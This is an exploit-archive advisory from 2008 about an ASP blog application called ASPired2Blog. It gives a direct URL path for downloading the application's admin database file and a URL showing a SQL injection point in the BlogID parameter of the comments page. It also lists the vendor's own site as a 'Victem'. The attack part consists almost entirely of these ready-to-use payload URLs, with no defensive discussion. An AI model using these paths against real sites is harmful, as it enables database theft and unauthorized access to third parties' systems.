[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : The Net Guys ASPired2Blog (SQL/DD) Multiple Remote Vulnerabilities
# Published : 2008-12-12
# Author : Pouya_Server
# Previous Title : Social Groupie (create_album.php) Remote File Upload Vulnerability
# Next Title : Moodle 1.9.3 Remote Code Execution Vulnerability


#########################################################
---------------------------------------------------------
Portal Name: ASPIred2Blog
Vendor : http://thenetguys.us/Home/Blog.asp
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (SQL,DD)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/admin/blog.mdb
 
[SQL]:
http://site.com/[Path]/admin/blog_comments.asp?BlogID='[SQL]
 
---------------------------------
Victem :
http://thenetguys.us/ASPired2/Blog/index.asp

# www.Syue.com [2008-12-12]